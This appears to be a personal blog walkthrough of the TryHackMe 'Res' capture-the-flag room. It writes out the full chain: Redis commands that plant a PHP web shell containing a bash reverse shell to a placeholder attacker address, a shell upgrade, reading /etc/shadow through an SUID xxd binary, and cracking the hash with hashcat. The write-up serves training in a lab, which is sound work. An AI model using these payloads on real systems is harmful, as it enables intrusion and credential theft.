narancs's blog

TryHackMe – Res walkthrough

TryHackMe Res CTF room logo

Introduction

Res is a semi-guided CTF room on TryHackMe. We need to exploit Redis to get a shell on the target. Then we need to use an SUID binary and password cracking to gain elevated privileges.

Enumeration

Since this is a semi-guided room, we have some questions that help us step-by-step:

  • Scan the machine, how many ports are open?
  • What’s is the database management system installed on the server?
  • What port is the database management system running on?
  • What’s is the version of management system installed on the server?
  • Compromise the machine and locate user.txt
  • What is the local user account password?
  • Escalate privileges and obtain root.txt

I started with nmap to check open ports on the target.

From the above output of nmap we can answer the first 4 questions.

The next task is:

  • Compromise the machine and locate user.txt

User flag

On this particular machine we can access Redis service without credentials.

Connect to Redis service via redis-cli:

				
					redis-cli -h MACHINE_IP
				
			

For exploiting Redis, I used ‘Redis RCE / Webshell’ exploit from https://book.hacktricks.xyz/pentesting/6379-pentesting-redis

We need to know the document root of the website. If we visit the site it is shown on the default page:

Then run the following commands to place a reverse shell in the document root of the website.

				
					config set dir /var/www/html
config set dbfilename redis.php
set test "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/<LOCAL IP>/<LOCAL PORT> 0>&1'\"); ?>"
save
				
			
I started a listener and triggered the reverse shell by visiting http://MACHINE_IP/redis.php.

I received a shell as www-data user. Then I upgraded my shell with the following commands:

				
					python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
*** press CTRL+Z to background the shell ***
stty raw -echo; fg
				
			

I was able to read the user flag from /home/vianka/user.txt.

Root flag

One of the things I checked for privileges escalation is the list of files that have the SUID bit set.

				
					find / -perm /4000 -type f 2> /dev/null
				
			

The file that stood out was /usr/bin/xxd. GTFObins shows how to read arbitrary files with it.

For the next question we need to know the password of vianka user. So, I used xxd to read /etc/shadow file.

				
					xxd /etc/shadow | xxd -r
				
			

Then I used hashcat to crack the password.

				
					hashcat -a 0 -m 1800 '$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0'  /usr/share/wordlists/rockyou.txt --quiet
				
			

Now we have the answer for question 6.

The last question was to get the root flag. I switched to vianka user with the cracked password. Then I checked sudo privileges: vianka can run any commands with sudo.

vianka's sudo capabilities
I switched to root with sudo -i command and read the flag from /root/root.txt.

Summary

The Res CTF room is a relatively easy and straight-forward room on TryHackme. There is not much that we can find on the machine. There is only an HTTP server running serving the default page, and a Redis server. Also, the questions lead us step-by-step to exploit our target.

First I exploited Redis unauthenticated access. I was able to create a reverse shell in the document root of the web server. After getting a shell on the target, I found that xxd binary had the SUID bit set.

I used xxd to read /etc/shadow file and get the password hash of vianka user. I cracked the hash with hashat and switched to vianka user. Vianka had privileges to run any command as root with sudo, so I was able to switch to root user and get the flag.

Table of Contents

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments

Related posts

0
Would love your thoughts, please comment.x
()
x